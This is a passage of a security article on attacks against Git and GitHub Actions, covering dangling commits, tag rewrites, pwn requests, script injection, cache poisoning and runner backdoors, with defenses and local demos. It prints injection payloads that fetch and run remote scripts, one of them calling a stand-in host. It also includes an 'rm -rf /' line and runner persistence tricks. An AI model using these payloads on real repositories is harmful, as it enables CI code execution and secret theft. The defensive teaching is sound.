&lt;p&gt;The catch is "how do you learn the SHA?". Per Truffle Security, the git protocol allows references by &lt;strong&gt;short SHA (4 chars minimum)&lt;/strong&gt;. The GitHub UI also resolves commits via short-SHA URLs, so 4 chars = 16^4 = 65,536 attempts of brute force is enough to find a commit. Truffle reports finding &lt;strong&gt;40 valid API keys&lt;/strong&gt; in deleted forks of a major AI company.&lt;/p&gt;

&lt;p&gt;GitHub's response when reported was "intentional design decision". The behavior is staying.&lt;/p&gt;

&lt;p&gt;The defense is heavy.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Treat the deleted fork as a leak and rotate the secret&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;When experimenting on a private fork tied to a public repo, double-check what you &lt;code&gt;git push&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Enable secret scanning (push protection) at the org level.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  2.3 Dangling commits / oops commits
&lt;/h3&gt;

&lt;p&gt;Force push only "removes a commit from history"; the object itself remains both locally and on the remote.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuilmtzotwgwo3c5hmbvx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuilmtzotwgwo3c5hmbvx.png" alt="Dangling commits" width="800" height="512"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;GitHub Archive&lt;/strong&gt; (gharchive.org) is a third-party archive that has been publishing GitHub's public events API as hourly time-ordered JSON dumps since 2011. It contains every public push / fork / PR event. &lt;code&gt;PushEvent&lt;/code&gt; carries &lt;code&gt;before&lt;/code&gt; and &lt;code&gt;after&lt;/code&gt; SHAs, so collecting the ones with &lt;code&gt;force=true&lt;/code&gt; gives you "the list of SHAs of dropped commits". Truffle Security's &lt;strong&gt;Force Push Scanner&lt;/strong&gt; pulls &lt;code&gt;before SHA&lt;/code&gt; from this archive and fetches each commit in turn to look for secrets.&lt;/p&gt;

&lt;p&gt;Scanning all dangling commits since 2020 with this technique, the report by Sharon Brizinov and Truffle Security found a &lt;strong&gt;GitHub PAT with admin permissions over the Istio repositories&lt;/strong&gt;, plus large quantities of valid AWS / MongoDB credentials and API tokens. They collected about 25,000 USD in bug bounties (tokens were revoked after responsible disclosure). &lt;strong&gt;Already-rotated secrets are obviously useless&lt;/strong&gt;, but the dominant pattern was secrets that nobody rotated after the original push.&lt;/p&gt;

&lt;p&gt;Defense:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Rotate after pushing a secret&lt;/strong&gt; (deleting from history is not enough).&lt;/li&gt;
&lt;li&gt;Add a local &lt;code&gt;gitleaks&lt;/code&gt; / &lt;code&gt;trufflehog&lt;/code&gt; hook before push.&lt;/li&gt;
&lt;li&gt;Enable GitHub's &lt;strong&gt;secret scanning push protection&lt;/strong&gt; (org setting).&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Layer 3: GitHub Actions
&lt;/h2&gt;

&lt;p&gt;That covered "raw git and GitHub". GitHub Actions stacks &lt;strong&gt;a CI execution environment + secrets + tokens&lt;/strong&gt; on top of all of that. The trust gaps in Layers 1 and 2 get amplified into "automated privilege escalation" on Actions. Concretely, tag rewrite becomes mass distribution to every consumer, &lt;code&gt;pull_request_target&lt;/code&gt; becomes a hole that hands secrets to outside PRs, &lt;code&gt;${{ }}&lt;/code&gt; expansion turns a branch name into RCE, and the cache becomes an infection vector via main branch.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Tag rewrite, amplified by CI (tj-actions and Trivy)
&lt;/h3&gt;

&lt;p&gt;The tj-actions and Trivy incidents at the top of this article are Layer 1.1 (tags are labels) projected onto the trust model of Actions.&lt;/p&gt;

&lt;p&gt;Side by side:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;tj-actions/changed-files (2025-03)&lt;/th&gt;
&lt;th&gt;aquasecurity/trivy-action (2026-03)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CVE&lt;/td&gt;
&lt;td&gt;CVE-2025-30066&lt;/td&gt;
&lt;td&gt;GHSA-69fq-xp46-6x23&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Affected repos&lt;/td&gt;
&lt;td&gt;~23,000&lt;/td&gt;
&lt;td&gt;~10,000 (Trivy alone)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tags rewritten&lt;/td&gt;
&lt;td&gt;~45 (v1 through v45, all of them)&lt;/td&gt;
&lt;td&gt;75 of 76&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Exposure window&lt;/td&gt;
&lt;td&gt;~15 hours&lt;/td&gt;
&lt;td&gt;~12 hours&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Entry point&lt;/td&gt;
&lt;td&gt;leaked token from reviewdog/action-setup&lt;/td&gt;
&lt;td&gt;reused credentials from the first compromise&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Payload&lt;/td&gt;
&lt;td&gt;dump secrets from runner memory as base64 to stdout&lt;/td&gt;
&lt;td&gt;tampered entrypoint.sh that loads a credential stealer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Detection&lt;/td&gt;
&lt;td&gt;StepSecurity flagged the anomaly&lt;/td&gt;
&lt;td&gt;Trivy maintainers disclosed the incident&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Some terminology from the table. &lt;strong&gt;reviewdog/action-setup&lt;/strong&gt; is a different Action that tj-actions depended on; the &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; leaked there gave the attacker write access to tj-actions's commits. &lt;strong&gt;StepSecurity&lt;/strong&gt; is a SaaS vendor that monitors GitHub Actions supply-chain behavior at runtime; in the tj-actions case they were the first to flag the anomaly of "this workflow is dumping base64 to a public log". For Trivy, the entry point is described as "reusing credentials leaked in the first compromise", i.e. the attacker rotated stolen credentials from one Action breach into another (per CrowdStrike's post-mortem, an automated bot called &lt;code&gt;hackerbot-claw&lt;/code&gt; was doing the reuse).&lt;/p&gt;

&lt;p&gt;What made Trivy worse is that this &lt;code&gt;hackerbot-claw&lt;/code&gt; was scanning many repos in parallel. It kept finding repos with broken &lt;code&gt;pull_request_target&lt;/code&gt; setups, stealing tokens, and rewriting tags on the next victim. &lt;strong&gt;It chains Layer 3.2 (pwn request) as the entry point with Layer 1.1 (tag rewrite) as the amplifier&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.2 Pwn Request (the &lt;code&gt;pull_request_target&lt;/code&gt; trap)
&lt;/h3&gt;

&lt;p&gt;GitHub Actions has two PR triggers, &lt;code&gt;pull_request&lt;/code&gt; and &lt;code&gt;pull_request_target&lt;/code&gt;. The difference is critical.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;&lt;code&gt;pull_request&lt;/code&gt;&lt;/th&gt;
&lt;th&gt;&lt;code&gt;pull_request_target&lt;/code&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Code that runs&lt;/td&gt;
&lt;td&gt;PR HEAD (= submitter's code)&lt;/td&gt;
&lt;td&gt;base branch (= existing code)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Token permissions&lt;/td&gt;
&lt;td&gt;read-only (&lt;code&gt;GITHUB_TOKEN&lt;/code&gt; restricted)&lt;/td&gt;
&lt;td&gt;base-side, with secrets access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Use case&lt;/td&gt;
&lt;td&gt;tests / builds&lt;/td&gt;
&lt;td&gt;linter / labeler / auto-comments&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Risk&lt;/td&gt;
&lt;td&gt;low&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;fatal if you check out the PR code&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Incidents typically come from a workflow shaped like this.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .github/workflows/format.yml (vulnerable)&lt;/span&gt;
&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;pull_request_target&lt;/span&gt;
&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;format&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v4&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;ref&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.pull_request.head.ref }}&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;npm install &amp;amp;&amp;amp; npm run format&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;git push&lt;/span&gt;  &lt;span class="c1"&gt;# push the formatted result back to the PR&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It checks out PR code (= attacker code) and runs it directly, while still sitting in the &lt;code&gt;pull_request_target&lt;/code&gt; context that can read base-branch secrets. At &lt;code&gt;npm install&lt;/code&gt;, the attacker's &lt;code&gt;package.json&lt;/code&gt; &lt;code&gt;postinstall&lt;/code&gt; runs and exfiltrates secrets.&lt;/p&gt;

&lt;p&gt;This is what hit &lt;strong&gt;Ultralytics YOLO&lt;/strong&gt; in December 2024. The branch name the attacker submitted as a PR was this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;openimbot:$({curl,-sSfL,raw.githubusercontent.com/.../file.sh}${IFS}|${IFS}bash)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Ultralytics's workflow inlined &lt;code&gt;${{ github.head_ref }}&lt;/code&gt; into a bash script, so the branch name was evaluated by the shell and pulled in a remote script. An XMRig Monero miner was injected into the PyPI release and ran on thousands of hosts.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5lwhi0lzup8xflr4fw4y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5lwhi0lzup8xflr4fw4y.png" alt="Pwn request" width="800" height="330"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Defense:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Don't check out PR HEAD under &lt;code&gt;pull_request_target&lt;/code&gt;&lt;/strong&gt;. If you absolutely must, sandbox it explicitly.&lt;/li&gt;
&lt;li&gt;Run formatters / linters under &lt;code&gt;pull_request&lt;/code&gt; against base code only.&lt;/li&gt;
&lt;li&gt;Default external PRs to &lt;code&gt;permissions: read-all&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;If you really need &lt;code&gt;pull_request_target&lt;/code&gt;, gate it with &lt;strong&gt;an &lt;code&gt;if&lt;/code&gt; condition that limits to trusted users&lt;/strong&gt; first.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3.3 Script Injection
&lt;/h3&gt;

&lt;p&gt;Adjacent to Pwn Request is shell injection via &lt;code&gt;${{ }}&lt;/code&gt;. GitHub Actions performs &lt;strong&gt;string substitution on &lt;code&gt;${{ ... }}&lt;/code&gt; before the shell runs&lt;/strong&gt;, so any shell metachar in a PR title or branch name turns into arbitrary code execution.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# vulnerable&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;echo "PR title: ${{ github.event.pull_request.title }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the PR title is &lt;code&gt;"; curl evil.sh | bash; echo "&lt;/code&gt;, the resulting shell is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"PR title: "&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; curl evil.sh | bash&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The same works on branch names. &lt;code&gt;zzz";echo${IFS}"hello";#&lt;/code&gt; is a &lt;strong&gt;valid branch name&lt;/strong&gt;, and &lt;code&gt;${IFS}&lt;/code&gt; expands to whitespace.&lt;/p&gt;

&lt;p&gt;Defense:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Pass untrusted values &lt;strong&gt;via environment variables&lt;/strong&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;PR_TITLE&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.pull_request.title }}&lt;/span&gt;
  &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "PR title&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;$PR_TITLE"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Or &lt;strong&gt;don't expand &lt;code&gt;${{ }}&lt;/code&gt; directly into bash&lt;/strong&gt;. Use structured inputs like &lt;code&gt;actions/github-script&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;GitHub Security Lab's &lt;code&gt;actionlint&lt;/code&gt; and Semgrep rules detect this pattern.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.4 Cache Poisoning
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;actions/cache&lt;/code&gt; saves and restores dependency caches to shorten build time. The problem is that &lt;strong&gt;cache scope is per repository&lt;/strong&gt;, and &lt;strong&gt;a cache written from main branch is readable by every branch and every workflow&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdlxct3ovya9g3s5incdp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdlxct3ovya9g3s5incdp.png" alt="Cache Poisoning" width="800" height="314"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In 2024 Adnan Khan published a PoC malware called &lt;strong&gt;Cacheract&lt;/strong&gt; that automates poisoning of GitHub Actions cache (&lt;code&gt;actions/cache&lt;/code&gt;). The cache is keyed per-repo and stores things like &lt;code&gt;node_modules/&lt;/code&gt;; another workflow run restores by the same key. Once Cacheract runs on main once, it writes itself back into the artifact and persists in the cache. Every subsequent workflow run picks up the malicious code on restore and re-infects automatically.&lt;/p&gt;

&lt;p&gt;In 2025 GitHub tightened cache eviction policy. The 2025-09-29 changelog announced a switch to &lt;strong&gt;hourly eviction&lt;/strong&gt;: when a repo passes the 10 GB cap, the oldest entries are evicted immediately (it used to be every 24 hours). Faster eviction makes it easier for an attacker to &lt;strong&gt;push a large poisoned entry that pushes the legitimate cache out, then drop in their own version&lt;/strong&gt;, all within a single workflow run. Note that the 2025-11-20 changelog moved in the opposite direction with "&lt;strong&gt;you can pay to exceed the 10 GB cap&lt;/strong&gt;", but in attack-surface terms the eviction speedup matters more.&lt;/p&gt;

&lt;p&gt;Adnan published a PoC where this technique came close to compromising &lt;strong&gt;Angular's dev infra&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Defense:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Strictly review pushes to main branch (this is the actual control).&lt;/li&gt;
&lt;li&gt;Include the commit SHA in the cache key.&lt;/li&gt;
&lt;li&gt;Guarantee build reproducibility with SLSA Provenance (the spec records which source / builder / inputs produced an artifact as a signed JSON. Inputs leaked in via cache will show up as a provenance mismatch).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3.5 Self-hosted runner backdoors
&lt;/h3&gt;

&lt;p&gt;GitHub Actions supports two kinds of runners: GitHub-managed and self-hosted. The latter runs on your own VM or server, with broader network access and privileges.&lt;/p&gt;

&lt;p&gt;If you use a self-hosted runner on &lt;strong&gt;a public repository&lt;/strong&gt;, an outside PR can execute code on the runner. This bites OSS projects fairly often. As one example, a 2022 Praetorian &lt;a href="https://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/" rel="noopener noreferrer"&gt;research post&lt;/a&gt; demonstrated, against large OSS including TensorFlow, that you could plant a runner backdoor from a malicious PR.&lt;/p&gt;

&lt;p&gt;The scary part is the &lt;strong&gt;persistence techniques&lt;/strong&gt;.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;RUNNER_TRACKING_ID=0&lt;/code&gt;&lt;/strong&gt;: the runner kills processes with a matching tracking ID at job end. Rewrite it to &lt;code&gt;0&lt;/code&gt; and your process survives the cleanup.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Detached docker container&lt;/strong&gt;: a container started with &lt;code&gt;docker run -d&lt;/code&gt; keeps running after the job ends.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Non-ephemeral runner&lt;/strong&gt;: by default runners are not single-use. Once you plant something, it survives across runs.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fif2gh9f75vtuqrxkigk2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fif2gh9f75vtuqrxkigk2.png" alt="self-hosted runner backdoors" width="797" height="586"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Sysdig published the details in January 2026. Because the runner only sends traffic to &lt;code&gt;github.com&lt;/code&gt;, network egress filters are nearly blind to it.&lt;/p&gt;

&lt;p&gt;Defense:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Don't use self-hosted runners on public repos&lt;/strong&gt; (this is the rule).&lt;/li&gt;
&lt;li&gt;Run &lt;strong&gt;ephemeral runners&lt;/strong&gt; (&lt;code&gt;--ephemeral&lt;/code&gt; flag, single-use per job).&lt;/li&gt;
&lt;li&gt;Run runners inside dedicated Kubernetes Pods (Actions Runner Controller).&lt;/li&gt;
&lt;li&gt;Default runner to &lt;code&gt;permissions: { contents: read }&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Hands-on: attack demos you can reproduce locally
&lt;/h2&gt;

&lt;p&gt;Here are the parts that &lt;strong&gt;fit inside a local docker setup&lt;/strong&gt;, as a small set of scripts. Running them yourself gives you the "wait, it's actually this easy?" feeling.&lt;/p&gt;

&lt;h3&gt;
  
  
  Demo 1: tag rewrite
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Attacker: build a repo with two commits&lt;/span&gt;
&lt;span class="nb"&gt;mkdir &lt;/span&gt;attacker &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;cd &lt;/span&gt;attacker
git init &lt;span class="nt"&gt;-b&lt;/span&gt; main
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"# Trusted action"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; README.md
git add &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; git commit &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"Initial good commit"&lt;/span&gt;
git tag v1.0
&lt;span class="nv"&gt;GOOD_SHA&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;git rev-parse HEAD&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Create a malicious commit and slap the same tag on it&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"rm -rf /"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; evil.sh
git add &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; git commit &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"Innocent change"&lt;/span&gt;
git tag &lt;span class="nt"&gt;-f&lt;/span&gt; v1.0
&lt;span class="nv"&gt;EVIL_SHA&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;git rev-parse HEAD&lt;span class="si"&gt;)&lt;/span&gt;

git log &lt;span class="nt"&gt;--oneline&lt;/span&gt; &lt;span class="nt"&gt;--decorate&lt;/span&gt;
&lt;span class="c"&gt;# Confirm v1.0 now points at the evil commit&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Push to a remote with &lt;code&gt;git push --force --tags&lt;/code&gt;. On the GitHub UI the release list still says &lt;code&gt;v1.0&lt;/code&gt;, but &lt;strong&gt;the commit it points to has been swapped&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Demo 2: commit author spoofing
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkdir &lt;/span&gt;spoof-demo &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;cd &lt;/span&gt;spoof-demo
git init &lt;span class="nt"&gt;-b&lt;/span&gt; main

&lt;span class="c"&gt;# Commit as anyone you like&lt;/span&gt;
git &lt;span class="nt"&gt;-c&lt;/span&gt; user.name&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'Linus Torvalds'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;-c&lt;/span&gt; user.email&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'torvalds@linux-foundation.org'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    commit &lt;span class="nt"&gt;--allow-empty&lt;/span&gt; &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"Definitely from Linus"&lt;/span&gt;

git log &lt;span class="nt"&gt;--format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'%an &amp;lt;%ae&amp;gt;'&lt;/span&gt;
&lt;span class="c"&gt;# Linus Torvalds &amp;lt;torvalds@linux-foundation.org&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Push this to GitHub and the UI shows Linus's actual avatar. There is no Verified badge, but it is hard to notice at a glance.&lt;/p&gt;

&lt;h3&gt;
  
  
  Demo 3: find a dangling commit
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkdir &lt;/span&gt;dangling-demo &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;cd &lt;/span&gt;dangling-demo
git init &lt;span class="nt"&gt;-b&lt;/span&gt; main
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"AWS_KEY=AKIA1234567890"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; .env
git add &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; git commit &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"oops with secret"&lt;/span&gt;
&lt;span class="nv"&gt;SECRET_SHA&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;git rev-parse HEAD&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Rewrite to a commit without the secret&lt;/span&gt;
git &lt;span class="nb"&gt;rm&lt;/span&gt; .env
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"# project"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; README.md
git add &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; git commit &lt;span class="nt"&gt;--amend&lt;/span&gt; &lt;span class="nt"&gt;--no-edit&lt;/span&gt;

&lt;span class="c"&gt;# The secret commit is no longer in log&lt;/span&gt;
git log &lt;span class="nt"&gt;--oneline&lt;/span&gt;

&lt;span class="c"&gt;# But it still lives in reflog and the object store&lt;/span&gt;
git cat-file &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="nv"&gt;$SECRET_SHA&lt;/span&gt;
&lt;span class="c"&gt;# author / message visible&lt;/span&gt;

&lt;span class="c"&gt;# fsck lists dangling objects&lt;/span&gt;
git fsck &lt;span class="nt"&gt;--lost-found&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Even after &lt;code&gt;git push --force&lt;/code&gt;, Truffle's Force Push Scanner can dig the commit back out of the remote object store.&lt;/p&gt;

&lt;h3&gt;
  
  
  Demo 4: minimal pull_request_target reproduction
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# vulnerable.yml&lt;/span&gt;
&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;pull_request_target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;types&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;opened&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;synchronize&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
